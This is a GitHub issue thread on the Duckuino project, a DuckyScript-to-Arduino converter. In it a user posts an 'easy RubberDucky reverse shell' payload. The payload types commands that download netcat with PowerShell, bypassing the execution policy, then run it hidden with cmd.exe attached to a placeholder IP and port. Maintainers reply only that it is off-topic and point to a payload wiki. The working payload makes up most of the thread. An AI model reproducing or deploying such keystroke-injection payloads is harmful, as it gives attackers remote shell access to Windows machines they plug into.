Dukweeno / Duckuino

Simple DuckyScript to Arduino C converter.
https://dukweeno.github.io/Duckuino/
MIT License
353 stars 117 forks source link

Easy RubberDucky Reverse Shell #100

Closed TIMOTHYMK closed 5 years ago

TIMOTHYMK commented 5 years ago

Make sure to change IP to your IP, and change PORT as well.

Let me know what you think. Thanks!

DELAY 400
GUI r
DELAY 100

STRING cmd
ENTER
DELAY 100

STRING cd / & mkdir win & cd win & echo (wget 'NETCAT_DL_LINK' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1
ENTER
DELAY 50

STRING START /MIN a.exe IP PORT -e cmd.exe -d & exit
ENTER
lowlevl commented 5 years ago

Hello @TIMOTHYMK, this might be a bit out of topic, as this project is only on compatibility one between USB Rubber Ducky and Arduino, maybe you should put it directly to the main repo ?

Plazmaz commented 5 years ago

^^ Yep, this is probably a better fit for https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads. Looks cool though!